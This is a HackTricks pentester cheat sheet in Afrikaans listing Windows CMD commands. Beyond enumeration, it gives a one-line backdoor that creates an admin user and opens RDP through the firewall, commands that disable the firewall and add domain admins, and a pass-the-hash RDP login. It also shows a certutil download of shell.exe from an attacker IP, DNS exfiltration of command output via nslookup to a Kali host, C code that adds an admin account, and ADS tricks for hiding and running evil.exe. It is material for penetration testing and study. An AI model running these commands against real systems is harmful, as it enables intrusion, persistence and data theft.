hacktricks/windows-hardening/basic-cmd-for-pentesters.md

448 lines
17 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Basiese Win CMD vir Pentesters
<details>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Werk jy by 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**hacktricks-opslag**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-opslag**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Stelselinligting
### Weergawe- en Patch-inligting
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```
### Omgewing
```bash
set #List all environment variables
```
### Sommige omgewingsveranderlikes om te beklemtoon:
* **COMPUTERNAME**: Naam van die rekenaar
* **TEMP/TMP:** Tydelike vouer
* **USERNAME:** Jou gebruikersnaam
* **HOMEPATH/USERPROFILE:** Tuisgids
* **windir:** C:\Windows
* **OS**: Windows-bedryfstelsel
* **LOGONSERVER**: Naam van domeinbeheerder
* **USERDNSDOMAIN**: Domeinnaam om met DNS te gebruik
* **USERDOMAIN**: Naam van die domein
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
### Gemonteerde skywe
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```
### [Verdediger](authentication-credentials-uac-and-efs/#defender)
### Stortbak
```bash
dir C:\$Recycle.Bin /s /b
```
### Prosesse, Dienste & Sagteware
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
## Domein inligting
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
### Logboeke & Gebeure
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
## Gebruikers & Groepe
### Gebruikers
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
### Groepe
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group
```
### Lys sessies
```
qwinsta
klist sessions
```
### Wagwoordbeleid
```
net accounts
```
### Geldeenhede
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
### Volharding met gebruikers
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
## Netwerk
### Koppelvlakke, Roetes, Poorte, Gasheer en DNS-cache
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
### Vuurwal
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
### Aandele
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
### Wifi
#### Netsh
Netsh is a powerful command-line tool that allows you to manage the network configuration of your system. Here are some useful commands for pentesters:
- **Show available networks:**
```shell
netsh wlan show networks
```
- **Show profiles stored on the system:**
```shell
netsh wlan show profiles
```
- **Show detailed information about a specific network profile:**
```shell
netsh wlan show profile name="NETWORK_NAME" key=clear
```
- **Export a network profile to an XML file:**
```shell
netsh wlan export profile name="NETWORK_NAME"
```
- **Delete a wireless network profile:**
```shell
netsh wlan delete profile name="NETWORK_NAME"
```
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
```
### SNMP
```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
### Netwerkinterfaces
```bash
ipconfig /all
```
### ARP-tabel
```bash
arp -A
```
## Aflaai
Bitsadmin.exe
```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
CertReq.exe
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe
```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
**Vind baie meer deur te soek na `Aflaai` in** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/)
## Verskeie
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### Bypass Karakter Swartlysing
```bash
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
Genereer 'n verduisterde CMD-lyn
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### Luisteradres ACL's
Jy kan luister op [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) sonder om 'n administrateur te wees.
```bash
netsh http show urlacl
```
### Handleiding DNS dop
**Aanvaller** (Kali) moet een van hierdie 2 opsies gebruik:
```bash
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
```
#### Slagoffer
**`for /f tokens`** tegniek: Dit stel ons in staat om opdragte uit te voer, die eerste X woorde van elke lyn te kry en dit deur DNS na ons bediener te stuur
```bash
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
```
Jy kan ook **omleiding** die uitset, en dit dan **lees**.
```
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```
## Oproep vanaf CMD vanuit C-kode
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
```
## Alternatiewe Datastrome Spiekbrief (ADS/Alternatiewe Datastroom)
**Voorbeelde geneem van** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. Daar is nog baie meer daar!**
```bash
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```
<besonderhede>
<opsomming><sterk>Leer AWS-hacking vanaf nul tot held met</sterk> <a href="https://training.hacktricks.xyz/courses/arte"><sterk>htARTE (HackTricks AWS Red Team Expert)</sterk></a><sterk>!</sterk></opsomming>
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-opslag**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-opslag**](https://github.com/carlospolop/hacktricks-cloud).
</besonderhede>